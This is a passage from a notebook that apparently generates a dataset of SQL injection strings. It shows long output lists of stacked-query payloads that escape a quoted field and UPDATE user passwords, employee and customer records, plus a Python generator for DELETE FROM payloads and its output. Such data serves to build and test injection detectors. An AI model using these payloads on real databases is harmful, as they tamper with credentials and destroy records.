 '\\"; UPDATE employee SET email = "6WEcx", nickname = "CMgYGrij", house_registration = "DhnUMOX8OghlI", lname = "ePxUCdDdJ", employee_id = "OlBd4bKQM", address = "s1gb9CR1mQAis", work_background = "qZiFwehMAFpZPO", id_card = 1976259338083, graduation_certificate = "W0Tl6", fname = "AMaPn", prefixname = "SIhnF" WHERE employee_id = "Mz9BX"# ',
 '\\"; UPDATE users SET username = "ozWYNBlLE" WHERE username = "HesXi"# ',
 '\\"; UPDATE service SET price = 997 WHERE price = 389#',
 '\\"; UPDATE employee SET tel = 0683159389, prefixname = "ziNtzdms", fname = "txoNxbqcIGeF", email = "qol0uB6xV7pPP", house_registration = "ik97H8oy", graduation_certificate = "JxEp8d894U", lname = "cNiNOP", employee_id = "DDJuwYt79iUS", address = "sgDmZvx2K7", id_card = 1964514278514 WHERE email = "sTsawn"-- ',
 '\\"; UPDATE users SET username = "EfdCKc" WHERE password = "mWvI5U2NACL"#',
 '\\"; UPDATE employee SET id_card = 1921601792188, lname = "cOAP", house_registration = "SG7l4zLn", employee_id = "QVwORT6Rfh", address = "S6a66xt5ZDYkgp", fname = "VLfB", prefixname = "bbwKHsvJWUdYN", work_background = "GaP06l" WHERE id_card = 1921827274729# ',
 '\\"; UPDATE users SET password = "cbAbuuXUc7m60" WHERE password = "EXWko627bJj5"-- ',
 '\\"; UPDATE users SET password = "CgtylHLbLkke" WHERE password = "HrJIp3g6vFFOwv5"#',
 '\\"; UPDATE employee SET id_card = 1780072590779 WHERE work_background = "E3raYHXIqrNuQY"# ',
 '\\"; UPDATE service SET name = "mvZoJoBX" WHERE name = "CdEpOOQ"# ',
 '\\"; UPDATE customer SET email = "dzEQrhnnpreNe" WHERE lname = "mspvEKtL"-- ',
 '\\"; UPDATE employee SET address = "T8zvue4uDdcRldw", fname = "bwmNLBnQVT", work_background = "vnGPO6gio9", employee_id = "T7Bj0cL", id_card = 1842091715930 WHERE id_card = 1752812744134#',
 '\\"; UPDATE service SET name = "NBYLNAsXqKgKAE" WHERE name = "HXbuQNG"# ',
 '\\"; UPDATE customer SET lname = "EwBOBYvOhYCFdNA", customer_id = "y6oVRB2" WHERE fname = "NsDT"# ',
 '\\"; UPDATE users SET password = "N0ck9Wrja" WHERE username = "ORAzkZTOEMbWcnS"-- ',
 '\\"; UPDATE service SET price = 753 WHERE price = 514-- ',
 '\\"; UPDATE service SET price = 996 WHERE price = 545-- ',
 '\\"; UPDATE customer SET email = "oplEXi3TYRf" WHERE lname = "XmtZbw"-- ',
 '\\"; UPDATE users SET password = "39fJEfve5te" WHERE username = "YvAdSRvSBaJcSi"-- ',
 '\\"; UPDATE users SET password = "KLBEFTjV" WHERE username = "XWDqcOYdgyt"# ',
 '\\"; UPDATE service SET name = "RrZxSXPIkK" WHERE price = 546# ',
 '\\"; UPDATE customer SET lname = "tcjqILbiOHg", customer_id = "wnMc" WHERE email = "Ms8pFPrCDEpU"# ',
 '\\"; UPDATE service SET price = 012 WHERE name = "PdQLQCjrt"#',
 '\\"; UPDATE service SET name = "CnofdGXtoh" WHERE name = "AWcURufWFRfXdCw"# ',
 '\\"; UPDATE employee SET id_card = 1539742864654, house_registration = "BgTfhj", prefixname = "JEJSUXWoH", fname = "YOuvZQWleL", tel = 0398032726, nickname = "WjjkeZxAmIU", email = "CT1kfjcBOHbhHB", address = "1vY1e3WMyj", graduation_certificate = "Q8OENcWXEbA" WHERE fname = "TsMamVzJIB"-- ',
 '\\"; UPDATE service SET name = "SrZMBsnckNxI" WHERE price = 492# ',
 '\\"; UPDATE service SET price = 539 WHERE name = "jRYNgB"# ',
 '\\"; UPDATE customer SET lname = "BMlUUBgTIhnrz", email = "0Fn1Tvcp", tel = 0270125456, fname = "VlbNX" WHERE email = "8JaXCR"-- ',
 '\\"; UPDATE service SET name = "SxdVVLzrcrQWuNC" WHERE name = "qWuSgFGveah"# ',
 '\\"; UPDATE customer SET tel = 0637410650 WHERE lname = "eBBqaCuyySilrG"#',
 '\\"; UPDATE users SET password = "tT2CEMb1EaoE3r" WHERE password = "BNwU2"-- ',
 '\\"; UPDATE users SET password = "niKLlvBX5" WHERE password = "awoZLDGJ9"#',
 '\\"; UPDATE service SET name = "UTqhFLEWpnhgC" WHERE name = "sRdHBNGEwX"-- ',
 '\\"; UPDATE service SET price = 803 WHERE name = "WAfDEHRXyBGx"-- ',
 '\\"; UPDATE users SET username = "RrPzDLPZb" WHERE password = "f2S6dqlo"# ',
 '\\"; UPDATE service SET price = 455 WHERE name = "lUZYhTkSAZ"# ',
 '\\"; UPDATE customer SET fname = "qdUqZy", tel = 0352252975, customer_id = "R1yQVHPcIacDa" WHERE fname = "BfQsF"-- ',
 '\\"; UPDATE customer SET email = "VDHD8niZRbuIQ" WHERE customer_id = "OMXbzj9JpPsu"#',
 '\\"; UPDATE service SET name = "XLGucGuluTmgHwj" WHERE name = "rLeDxo"#',
 '\\"; UPDATE employee SET graduation_certificate = "7aOgkQiOY8UY72R", lname = "tmvyYGHxUeqd", address = "6XDk", nickname = "QcHAoSCW", fname = "spkBzKl", tel = 0220630333, house_registration = "rcU7nn56J3", employee_id = "MGEpqLp0m", id_card = 1995594693331, email = "GG40Hov" WHERE email = "kzNlCF"-- ',
 '\\"; UPDATE customer SET lname = "PRQYpFxfcgVpX", email = "M1bWr6j01dAu9so" WHERE customer_id = "Og0evr947FObTcu"-- ',
 '\\"; UPDATE users SET password = "zxTCqc" WHERE username = "vyxGCeYfjou"#',
 '\\"; UPDATE employee SET work_background = "UeSL6IwcOe", house_registration = "XYQqqYH" WHERE lname = "pasGW"# ',
 '\\"; UPDATE employee SET employee_id = "AgwBBIYk4L0", house_registration = "S64UGtDhlJV2wF" WHERE house_registration = "SDA2IHnmkhchtj"#',
 '\\"; UPDATE users SET password = "0i2HWX" WHERE username = "ROWNcdCFaTWT"-- ',
 '\\"; UPDATE employee SET prefixname = "PujMVJutGU", address = "QpULqp3JUGxt", nickname = "QQyDqGwVDeEFA", email = "NW9kf1TgvCX" WHERE prefixname = "Phyt"#',
 '\\"; UPDATE employee SET email = "LLxcyBRn4rQ8", prefixname = "lcGWoj", id_card = 1756877269245, work_background = "lweeiBug", nickname = "ZgmGpJJ" WHERE house_registration = "MHs9"# ',
 '\\"; UPDATE customer SET customer_id = "YPU4", tel = 0332791910, lname = "RWvzUCoUv", fname = "vopauZDtpaB" WHERE fname = "dgpAOcBwf"# ',
 '\\"; UPDATE customer SET email = "AMeNXoQusqtHs", customer_id = "dxJWlXiRjes4" WHERE tel = 0430738630# ',
 '\\"; UPDATE employee SET email = "wUIxWf", lname = "JCmoCuaXco", id_card = 1760145906095, employee_id = "NWjX", address = "s4xarqTXKMlGSU", fname = "lbYQc", tel = 0727584794, house_registration = "FWx4uaH", graduation_certificate = "6ePlGJ" WHERE id_card = 1792961367732#',
 '\\"; UPDATE service SET price = 239 WHERE price = 625# ',
 '\\"; UPDATE customer SET lname = "KtxgPSuVQLDOr", email = "MGr65QLMuggf", fname = "umLMbkeV" WHERE lname = "pqOYHPJ"-- ',
 '\\"; UPDATE service SET name = "dFnxi" WHERE price = 181# ',
 '\\"; UPDATE service SET price = 649 WHERE price = 854-- ',
 '\\"; UPDATE users SET username = "pMTKrthDSOF" WHERE username = "OAoAgOBvEXwpre"# ',
 '\\"; UPDATE employee SET house_registration = "Xg7TcxG", nickname = "VFDfL", prefixname = "GSvwbiWADbN", email = "Rq2YjiESyBR", work_background = "kVndZ3C", employee_id = "rEpoOMFu" WHERE address = "cWfJqFwx04KL"# ',
 '\\"; UPDATE employee SET fname = "cWddiIggxYhS", address = "gIVWNx3q2NI", id_card = 1867131330824, work_background = "S8H9OGZbOQgxbp" WHERE prefixname = "ZNLQVEdnXktjrjS"#',
 '\\"; UPDATE users SET password = "z3p78MscTpkWj" WHERE username = "NZwLLXP"#',
 '\\"; UPDATE employee SET house_registration = "GGy1wjC", lname = "DyjozXEMtEo", fname = "RoeKRJVxdvXBvO", tel = 0426248725, nickname = "RCoymaidCyG", address = "7YjY8tsBC" WHERE graduation_certificate = "EC4HiYA"# ',
 '\\"; UPDATE service SET name = "soEkQMJPPLHJ" WHERE name = "QpCT"# ',
 '\\"; UPDATE service SET name = "pmGukfKRg" WHERE price = 264# ',
 '\\"; UPDATE employee SET address = "amAJH0Mxx" WHERE lname = "BoPUgFCYh"-- ',
 '\\"; UPDATE service SET name = "QypMIEtWTVsjYqK" WHERE price = 171-- ',
 '\\"; UPDATE service SET name = "DudWAfpoB" WHERE name = "TKAEiRnTykh"# ',
 '\\"; UPDATE employee SET lname = "CqffmXqGYKDI", house_registration = "XvTn" WHERE nickname = "SiccpaeLwVz"#',
 '\\"; UPDATE service SET name = "vUxX" WHERE price = 303#',
 '\\"; UPDATE service SET price = 769 WHERE price = 412-- ',
 '\\"; UPDATE employee SET prefixname = "fUvgNAz", work_background = "zNAArP2FL", id_card = 1630720140376, lname = "oJJUZmXmyAJnY", email = "lcw1L1TwgT3Pffl", graduation_certificate = "CfZ3ungM", address = "ywSUAQZCENzy" WHERE lname = "jSiM"#',
 '\\"; UPDATE employee SET id_card = 1798505204408, prefixname = "nkOEpluRw", house_registration = "uth9uO", fname = "yRvVpj", employee_id = "sVqUra", tel = 0773544024, lname = "yMTJoc", work_background = "HaQ4" WHERE fname = "hfpyRerU"# ',
 '\\"; UPDATE service SET price = 838 WHERE name = "pxHDE"#',
 '\\"; UPDATE users SET username = "wMWcX" WHERE username = "ExxBlsWBclHot"# ',
 '\\"; UPDATE users SET password = "5sehXvD2uSehN" WHERE password = "rcJA"#',
 '\\"; UPDATE service SET price = 088 WHERE name = "aJMPOtq"#',
 '\\"; UPDATE users SET password = "IuOtKt75t" WHERE password = "ONBpjyL4vYm3w"# ',
 '\\"; UPDATE users SET username = "RoxtVXPwUPyINsc" WHERE username = "fXLafzHkSOpSqA"-- ',
 '\\"; UPDATE users SET password = "SPU50P8gXlmZ" WHERE password = "jlUFplI1pC"-- ',
 '\\"; UPDATE employee SET fname = "ububpTSU", house_registration = "JlajZZp5qOuK4x", email = "QvtnG7y6", nickname = "dhVN", id_card = 1927937982048, tel = 0588484069, graduation_certificate = "rEWPTBDwCV", prefixname = "PbeMBy", work_background = "DiUWv5ogiu7" WHERE graduation_certificate = "tHF65gqw0THgo"#',
 '\\"; UPDATE customer SET customer_id = "cOZdMvf8BlAX7uw" WHERE lname = "JpRhUzIDkbgz"-- ',
 '\\"; UPDATE service SET name = "yyxYfrWZCzIDb" WHERE name = "rEVHV"# ',
 '\\"; UPDATE customer SET email = "hrRunaWw", customer_id = "5bFx2wkIR4r", fname = "nsmMUuUcJBWq" WHERE lname = "ybbsUyeQQSPhOKK"#',
 '\\"; UPDATE customer SET tel = 0760451985 WHERE tel = 0160629562# ',
 '\\"; UPDATE service SET name = "ieqPvtCsZgS" WHERE price = 555-- ',
 '\\"; UPDATE customer SET email = "GO9m0" WHERE tel = 0698223546# ',
 '\\"; UPDATE users SET password = "fWYrcER4" WHERE username = "POAKHQ"#',
 '\\"; UPDATE users SET username = "oOuLxNmKzKdBABC" WHERE password = "e82k9FIh"#',
 '\\"; UPDATE customer SET lname = "xLhdLIMZWQUU", fname = "ozvaoKZsguqufgR" WHERE customer_id = "0PpaHJ2Tj"#',
 '\\"; UPDATE employee SET address = "ESA1UzQOuKSi" WHERE id_card = 1603074285258# ',
 '\\"; UPDATE users SET password = "9Lc0WFu0kpO5V" WHERE username = "fZGuGSGWUqTu"# ',
 '\\"; UPDATE employee SET address = "cWofntyqDeh" WHERE tel = 0424426637# ',
 '\\"; UPDATE users SET password = "jGJgOPm1FGiy" WHERE username = "niSjLjPZdjr"# ',
 '\\"; UPDATE users SET username = "thSXZm" WHERE password = "4bvmui8wMS"# ',
 '\\"; UPDATE users SET username = "ZqXmSm" WHERE username = "ouRWJJUs"# ',
 '\\"; UPDATE users SET username = "nxhNISXg" WHERE username = "AjPBRjUzzyXyuWE"#',
 '\\"; UPDATE users SET username = "KLxfzbi" WHERE password = "B0JbTXIDQzqhPb"-- ',
 '\\"; UPDATE service SET name = "ExzLrmHojN" WHERE price = 912-- ',
 '\\"; UPDATE service SET name = "bmPAkefIAah" WHERE price = 378-- ',
 '\\"; UPDATE service SET name = "QpQmOqCHZRuwhY" WHERE price = 115# ',
 '\\"; UPDATE employee SET tel = 0764412395, work_background = "KWEkXfvswhS", employee_id = "J40yHRpgFtNk", address = "1NwALQTfZ9WsnG" WHERE lname = "plvLVZfbPh"#',
 '\\"; UPDATE service SET name = "IkTSyMwmkCieMr" WHERE name = "pSxwXEvsWpM"-- ',
 '\\"; UPDATE service SET name = "yQlpCWTCQjErfgW" WHERE price = 109# ',
 '\\"; UPDATE service SET name = "KPVSFxjDcgTD" WHERE price = 730-- ',
 '\\"; UPDATE employee SET prefixname = "sNVaWJgsr", graduation_certificate = "xhAmba9OtVE", lname = "vEfWxz", house_registration = "875b5RV", address = "qn7EVh", work_background = "ZzF0rxGA", tel = 0761424271, id_card = 1588673337325, email = "LYj4rd45Mso57Py", nickname = "zaaimOGpgRY", fname = "npxUzDdSCxcWewU" WHERE employee_id = "OvA2TBEpbXpg"-- ',
 '\\"; UPDATE employee SET house_registration = "85bluZ52qGCR", lname = "uZvjuj", employee_id = "0FXU3D", address = "WdKrW", work_background = "SAmuP4JivspKW", id_card = 1852327695047, email = "qA0LEFaxrmnwQzw", nickname = "FPrJ", prefixname = "cZCmniO" WHERE employee_id = "3n9Va3Um7B"-- ',
 '\\"; UPDATE customer SET customer_id = "9HagPj1C", email = "P8VdVqr6", tel = 0543799684 WHERE tel = 0239852312-- ',
 '\\"; UPDATE customer SET tel = 0761229515, fname = "sufVrsXLpDl" WHERE lname = "IyAiNgtBw"# ',
 '\\"; UPDATE service SET price = 743 WHERE price = 149# ',
 '\\"; UPDATE customer SET email = "jGu3Lom8", fname = "eVBbHKIU", customer_id = "QF12AATpB", tel = 0312511238 WHERE tel = 0474449191-- ',
 '\\"; UPDATE users SET username = "TVNN" WHERE username = "gAvX"# ',
 '\\"; UPDATE service SET price = 210 WHERE price = 631-- ',
 '\\"; UPDATE employee SET prefixname = "OzKocwFMGmjbYxM", graduation_certificate = "aGxN9h", fname = "lpVnO", address = "OYY6gm", id_card = 1595021534718, lname = "TgTOn" WHERE lname = "jPJMkZqIeHZqTWQ"# ',
 '\\"; UPDATE employee SET work_background = "7RodmyKV0Z", email = "WmZdCjy", nickname = "YbESijZeYRVujTa", id_card = 1532217758942, employee_id = "7J8I", prefixname = "bGAGL", tel = 0913418532 WHERE tel = 0734793136-- ',
 '\\"; UPDATE service SET price = 686 WHERE price = 482# ',
 '\\"; UPDATE customer SET email = "9a35Kg" WHERE fname = "ihZNd"# ',
 '\\"; UPDATE users SET username = "ullOOul" WHERE password = "4tgHyOg"# ',
 '\\"; UPDATE service SET name = "rYJSBmXrCy" WHERE name = "VIQdMg"-- ',
 '\\"; UPDATE customer SET fname = "HflBDcmgbziUaGL" WHERE fname = "yxRFMkJWkwMqB"#',
 '\\"; UPDATE customer SET email = "9t23QacEUj5wq", fname = "hraQ" WHERE fname = "NSDOsyOxKMtCW"#',
 '\\"; UPDATE service SET price = 248 WHERE price = 126-- ',
 '\\"; UPDATE employee SET id_card = 1840636264097, employee_id = "kEEOSfX", fname = "MqcEnNiicvuET", work_background = "v3Da6iTcn", prefixname = "YgeaTQjTG", address = "Kqux4a", house_registration = "iOLx8sK5HJSO0", graduation_certificate = "3I08lm0yD1e3", lname = "NwKrfsoVvUVa", tel = 0679625661, email = "WdHi58pkzAV5" WHERE email = "n9Ks73WofDHK9Jw"#',
 '\\"; UPDATE users SET password = "teRQwidWOgszX" WHERE password = "5WYNWjgtHIA"-- ',
 '\\"; UPDATE service SET price = 114 WHERE name = "nXtKfSbwB"-- ',
 '\\"; UPDATE customer SET tel = 0452781713, fname = "irndkJDTsVJe", customer_id = "iXBXh9NozxKArMA", lname = "KvVI" WHERE email = "IIejqkbhoiy3"# ',
 '\\"; UPDATE service SET name = "nDrkIJiaDELT" WHERE price = 408-- ',
 '\\"; UPDATE customer SET customer_id = "IN85QsPbJ22" WHERE fname = "DitUKviLiP"#',
 '\\"; UPDATE service SET name = "igcvgwuCxnmIL" WHERE name = "iduO"#',
 '\\"; UPDATE customer SET fname = "kJiOUzHIyuMF", email = "HQiGvenCQ3m7F", tel = 0790219236 WHERE tel = 0502611479#',
 '\\"; UPDATE users SET username = "KCCoquCAwpiE" WHERE username = "vXTsOrGYI"-- ',
 '\\"; UPDATE employee SET lname = "oupCyy", tel = 0460120150, nickname = "SFKg", address = "Nak91GO5I5R" WHERE employee_id = "k4PCPWISzjx"# ',
 '\\"; UPDATE service SET name = "lRjgs" WHERE name = "FYhJH"# ',
 '\\"; UPDATE customer SET customer_id = "PXShtUQtBI" WHERE tel = 0910712449-- ',
 '\\"; UPDATE users SET username = "OqqIcrXsa" WHERE password = "rPujTt6J"-- ',
 '\\"; UPDATE employee SET graduation_certificate = "qpHZIwyO", employee_id = "CCa1j", work_background = "5tcS3wHx6Ze", tel = 0964728442, fname = "bsyqKsFOfoK", nickname = "aOxuuTdon", prefixname = "uxdVHWxjM" WHERE lname = "AKZJVd"-- ',
 '\\"; UPDATE service SET price = 963 WHERE name = "PIphRwEJwjI"#',
 '\\"; UPDATE users SET password = "dP9OZQ" WHERE username = "POoecNVVZfkuDx"#',
 '\\"; UPDATE users SET password = "WvxlU" WHERE password = "5kRgfhZUyi0"-- ',
 '\\"; UPDATE customer SET tel = 0259792841, lname = "PRMeToDEV", fname = "KeEAhdrbN", email = "2faelH" WHERE fname = "PBQiwCDe"# ',
 '\\"; UPDATE employee SET tel = 0828545066, graduation_certificate = "FmKkoDMfT", nickname = "lkXPT", id_card = 1521873701466, house_registration = "5ODeM" WHERE work_background = "3vqzXh98VC8zQW"# ',
 '\\"; UPDATE employee SET address = "AqR33pC", prefixname = "wtzcYTjq" WHERE email = "rCOK1Sz4cu"#',
 '\\"; UPDATE users SET password = "6zG3nc8Mp" WHERE password = "tutP5FnG6jGb1S"-- ',
 '\\"; UPDATE customer SET customer_id = "LXe2hycci9a", email = "qyJeeCM2iZ3l" WHERE fname = "ekeMqZoeSw"# ',
 '\\"; UPDATE employee SET email = "SDqh" WHERE lname = "qEWhwJ"#',
 '\\"; UPDATE service SET price = 612 WHERE price = 749#',
 '\\"; UPDATE employee SET address = "2EAWzE", house_registration = "0dLHK6DWQ9ZCU", employee_id = "D6EQh6", tel = 0257957171, work_background = "y5x6nL4r", graduation_certificate = "x7T8yg1Ux9iuDUt", nickname = "ntzqY", id_card = 1707838843893 WHERE work_background = "TJc2RFg"-- ',
 '\\"; UPDATE customer SET tel = 0587324509, lname = "BFmlBPqYSuVbbX", customer_id = "feFb2Z", email = "KeLhh0V3wjOq" WHERE fname = "IjyUqcB"-- ',
 '\\"; UPDATE employee SET tel = 0145697966, address = "hEnCmYCR0YPF", work_background = "RtnJ01qAWhG", nickname = "rrRNySzYE", id_card = 1560211243423, email = "j1nKDdN2sKEgG9C", prefixname = "rnMzvSQmzcRS", employee_id = "Dz5Y7vhLE" WHERE address = "RRtr52"-- ',
 '\\"; UPDATE users SET password = "QTBFuS1k" WHERE username = "dFVJXXLM"# ',
 '\\"; UPDATE employee SET email = "xbIfL4uP" WHERE employee_id = "q0vuWNFC"# ',
 '\\"; UPDATE customer SET tel = 0318740838 WHERE email = "rngz9zch5"#',
 '\\"; UPDATE customer SET email = "m32lZafWHAEeQSX" WHERE email = "6mBEVR9MIe3"-- ',
 '\\"; UPDATE customer SET customer_id = "fZIHpKw", email = "8seDAzZg4RUWGC5", lname = "PRgYr" WHERE lname = "fOMsnruBEEyd"-- ',
 '\\"; UPDATE service SET price = 356 WHERE price = 453# ',
 '\\"; UPDATE service SET name = "GKLYhOfwmnomD" WHERE name = "jFao"# ',
 '\\"; UPDATE employee SET fname = "uQoOFKTnKifo", id_card = 1933546713017, nickname = "JZaAMrCQaDGn", graduation_certificate = "ORu5Nh7aWPuSu", address = "D2wk3kB9", employee_id = "louUh", work_background = "QyUpExdRbtOlrU", lname = "celvBcAXED" WHERE tel = 0934062976# ',
 '\\"; UPDATE service SET price = 092 WHERE price = 192-- ',
 '\\"; UPDATE service SET price = 995 WHERE name = "xJYIephSP"# ',
 '\\"; UPDATE employee SET house_registration = "koJyTlI6aSdW6H", address = "Q2NVhhTdQ", employee_id = "sbsrE", nickname = "RrILVRdx", graduation_certificate = "uaAxUSXaP", id_card = 1740467190784 WHERE prefixname = "SRcSjKqruO"#',
 '\\"; UPDATE employee SET tel = 0306994630, fname = "pnVtkgmxRfAbh", work_background = "0iSP50Yd5u78ac" WHERE work_background = "kIakE4B"# ',
 '\\"; UPDATE service SET name = "WXfqS" WHERE name = "NFZTerSYA"#',
 '\\"; UPDATE customer SET customer_id = "sbEJo5", fname = "dXsXVjgfNTV", tel = 0802486391 WHERE lname = "WVuoqBYj"#',
 '\\"; UPDATE customer SET fname = "FcpKWrkzkdfjof" WHERE lname = "nytfUBtXfkIqE"-- ',
 '\\"; UPDATE customer SET email = "RrIfIxz4xLX9I0", customer_id = "UTkj0l9CmzxO", fname = "fcmh", lname = "VIbptNaKDpxUvfn" WHERE fname = "VjqFlBfz"-- ',
 '\\"; UPDATE users SET username = "QBjtBrp" WHERE password = "mVlQD3RRVBnLEwh"#',
 '\\"; UPDATE employee SET work_background = "LWEyvxSUdGUSlb", graduation_certificate = "Rq1WJzHHErDERx", tel = 0833693180 WHERE graduation_certificate = "9Qms0hvoh"-- ',
 '\\"; UPDATE employee SET nickname = "SLEpyvmDK", prefixname = "lFlpURishhjDBwS", work_background = "lUWzU6XnPETYY", lname = "mlWlAFmDvvRjrJ", address = "zqRv", employee_id = "rzBzG4uaouNAq", fname = "RaXxJqH", id_card = 1967384641277, house_registration = "XSJR" WHERE lname = "OsEZJ"-- ',
 '\\"; UPDATE customer SET tel = 0250340152, fname = "FRbqhpOxtxYrAF", lname = "ntgAkkJx" WHERE customer_id = "tKNZL98IwX"-- ',
 '\\"; UPDATE employee SET work_background = "dlQu6CsL83rZW", house_registration = "Y05e", fname = "ruHYkSXfeEStA" WHERE id_card = 1573093377996#',
 '\\"; UPDATE employee SET nickname = "ycJnaE", tel = 0317810167, fname = "rnijaxnzPg", lname = "TrcWBY", address = "LMtOZIuxBQ", graduation_certificate = "A0Ym4z7pvIvn", prefixname = "hZrlv" WHERE address = "wPVvI4E4"#',

In [19]:
def randomDeleteForSearch(table, table_value, last):
    gen=[]
    for i in range(200) :
        preStr =""
        random_table=table[random.randint(0, len(table)-1)]
        random_last=last[random.randint(0, len(last)-1)]
        random_table_value=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        first = type_of_value[random_table_value]
        if first == "tel":
            random_string = generate_random_string_tel()
        elif first == "price":
            random_string = generate_random_string_price()
        elif first == "id_card":
            random_string = generate_random_string_id_card()
        elif first == "str":
            random_string = generate_random_string_str()
        elif first == "both":
            random_string = generate_random_string_both()
        preStr += r'\"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + random_last
        # randomOperator = operator[random.randint(0, len(operator)-1)]
        # if (randomOperator) == "":
        #     gen.append('"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + random_last)
        # else:
        #     gen.append('"; ' +"DELETE FROM " + random_table + " WHERE " + random_table_value + " = " + random_string + randomOperator)
        #     random_table_value2=table_value[random_table][random.randint(0, len(table_value[random_table])-1)]
        #     first2 = type_of_value[random_table_value]
        #     if first2 == "tel":
        #         random_string2 = generate_random_string_tel()
        #     elif first2 == "price":
        #         random_string2 = generate_random_string_price()
        #     elif first2 == "id_card":
        #         random_string2 = generate_random_string_id_card()
        #     elif first2 == "str":
        #         random_string2 = generate_random_string_str()
        #     elif first2 == "both":
        #         random_string2 = generate_random_string_both()
        #     gen[i] += random_table_value2 + " = " + random_string2 + random_last
        if preStr in gen:
            continue
        else:
            gen.append(preStr)

    return gen

In [20]:
randomDeleteForSearch(table, table_value, last)

['"; DELETE FROM employee WHERE email = "cZjDSz1G93"#',
 '"; DELETE FROM employee WHERE employee_id = "V0Qi"-- ',
 '"; DELETE FROM employee WHERE email = "FGTahxHCUyCdk"#',
 '"; DELETE FROM employee WHERE employee_id = "8iiX"# ',
 '"; DELETE FROM service WHERE price = 877-- ',
 '"; DELETE FROM users WHERE username = "IbvVf"# ',
 '"; DELETE FROM users WHERE password = "YPZKOhwU"-- ',
 '"; DELETE FROM employee WHERE house_registration = "MN7RrggfTU1Wf"-- ',
 '"; DELETE FROM users WHERE username = "QKovlveEzruM"# ',
 '"; DELETE FROM users WHERE password = "rOjG5RhI1J3B"# ',
 '"; DELETE FROM service WHERE price = 598# ',
 '"; DELETE FROM employee WHERE employee_id = "7wKsKa"# ',
 '"; DELETE FROM users WHERE username = "kDoeDHbrSaTovPZ"# ',
 '"; DELETE FROM users WHERE username = "cHAW"# ',
 '"; DELETE FROM users WHERE password = "ech5l4hZM"# ',
 '"; DELETE FROM customer WHERE customer_id = "Fy6b"# ',
 '"; DELETE FROM users WHERE password = "hQEiU"-- ',
 '"; DELETE FROM service WHERE price = 784#',
 '"; DELETE FROM employee WHERE employee_id = "NKzYq3JX5d6L1qG"-- ',
 '"; DELETE FROM users WHERE password = "sE3tIlorqQR"# ',
 '"; DELETE FROM employee WHERE tel = 0663880507# ',
 '"; DELETE FROM service WHERE price = 298#',
 '"; DELETE FROM service WHERE name = "NlQYeJpTQOuh"# ',
 '"; DELETE FROM service WHERE name = "gVbcfLsqKR"-- ',
 '"; DELETE FROM employee WHERE address = "LBvrP"#',
 '"; DELETE FROM service WHERE price = 843-- ',
 '"; DELETE FROM employee WHERE tel = 0194469306-- ',
 '"; DELETE FROM service WHERE price = 163-- ',
 '"; DELETE FROM users WHERE username = "zpCqgbDi"#',
 '"; DELETE FROM customer WHERE customer_id = "riQony0to9YCb"# ',
 '"; DELETE FROM service WHERE name = "FzNEZHOwg"#',
 '"; DELETE FROM customer WHERE tel = 0318802308#',
 '"; DELETE FROM users WHERE password = "9xJicBVLkVpx"-- ',
 '"; DELETE FROM employee WHERE email = "Hbfm"# ',
 '"; DELETE FROM customer WHERE customer_id = "JwZNObS7mZJ"#',
 '"; DELETE FROM customer WHERE email = "Ojo1rFt"-- ',
 '"; DELETE FROM users WHERE password = "MFAzGHd2cqH"#',
 '"; DELETE FROM service WHERE price = 671# ',
 '"; DELETE FROM customer WHERE lname = "VtrsztocND"# ',
 '"; DELETE FROM users WHERE password = "uQHjBf0KxJj"#',
 '"; DELETE FROM employee WHERE fname = "qVbRQeWcVBiO"# ',
 '"; DELETE FROM service WHERE name = "DEdG"# ',
 '"; DELETE FROM employee WHERE lname = "jkGdKJ"# ',
 '"; DELETE FROM service WHERE name = "RPZrnPgtmC"-- ',
 '"; DELETE FROM users WHERE password = "28NQcJNzc"#',
 '"; DELETE FROM users WHERE username = "jGHiHnOW"# ',
 '"; DELETE FROM service WHERE name = "ThnUPMGFRKLMx"# ',
 '"; DELETE FROM customer WHERE customer_id = "CSRJpv8LqNWiF"-- ',
 '"; DELETE FROM service WHERE price = 176# ',
 '"; DELETE FROM users WHERE username = "kBAXDfOfW"-- ',
 '"; DELETE FROM service WHERE price = 913#',
 '"; DELETE FROM customer WHERE lname = "gpjSOFBhA"# ',
 '"; DELETE FROM employee WHERE house_registration = "l6BSHEQ"# ',
 '"; DELETE FROM customer WHERE lname = "RngxwysdZNEfH"-- ',
 '"; DELETE FROM service WHERE name = "BAZsuGdEtF"# ',
 '"; DELETE FROM service WHERE name = "ZVRhQ"-- ',
 '"; DELETE FROM customer WHERE fname = "iwnqbaZUpod"#',
 '"; DELETE FROM customer WHERE email = "aZcWj"-- ',
 '"; DELETE FROM users WHERE username = "FPWzoyc"-- ',
 '"; DELETE FROM users WHERE username = "qDYoCyT"# ',
 '"; DELETE FROM customer WHERE lname = "yuBPKGgcM"#',
 '"; DELETE FROM employee WHERE house_registration = "sXtGz5kvx"#',
 '"; DELETE FROM users WHERE username = "zKOARRpMOxfSDTo"#',
 '"; DELETE FROM employee WHERE nickname = "fiQAI"#',
 '"; DELETE FROM employee WHERE fname = "agSivEpTM"#',
 '"; DELETE FROM users WHERE password = "82epO7e6Yb4kfu"#',
 '"; DELETE FROM employee WHERE work_background = "ZZzbZVt"-- ',
 '"; DELETE FROM users WHERE username = "QhWxStXpYaJZSfB"-- ',
 '"; DELETE FROM customer WHERE fname = "XnZrTjxfifMUCK"# ',
 '"; DELETE FROM users WHERE password = "4g8gw"-- ',
 '"; DELETE FROM employee WHERE employee_id = "307XPQEn01w"#',
 '"; DELETE FROM users WHERE username = "LrRDMhGGKv"# ',
 '"; DELETE FROM customer WHERE customer_id = "5KTHF4tW7MPN"-- ',
 '"; DELETE FROM users WHERE password = "OHFBEbU5"-- ',
 '"; DELETE FROM employee WHERE graduation_certificate = "6ixcRxQ3Uh"-- ',
 '"; DELETE FROM users WHERE password = "XQzPELYx0cR"# ',
 '"; DELETE FROM service WHERE name = "JLApXgeX"#',
 '"; DELETE FROM users WHERE username = "KkHqAlBu"#',
 '"; DELETE FROM customer WHERE fname = "JwVpR"#',
 '"; DELETE FROM customer WHERE fname = "CeJHpLtZkdh"-- ',
 '"; DELETE FROM customer WHERE customer_id = "kgKGQO9C"-- ',
 '"; DELETE FROM employee WHERE address = "0CaYr"#',
 '"; DELETE FROM customer WHERE tel = 0524394147# ',
 '"; DELETE FROM customer WHERE fname = "ZjazvnsEA"-- ',
 '"; DELETE FROM customer WHERE fname = "nKRoG"# ',
 '"; DELETE FROM customer WHERE tel = 0535610420#',
 '"; DELETE FROM users WHERE password = "XhejE"#',
 '"; DELETE FROM customer WHERE email = "I6QgC"# ',
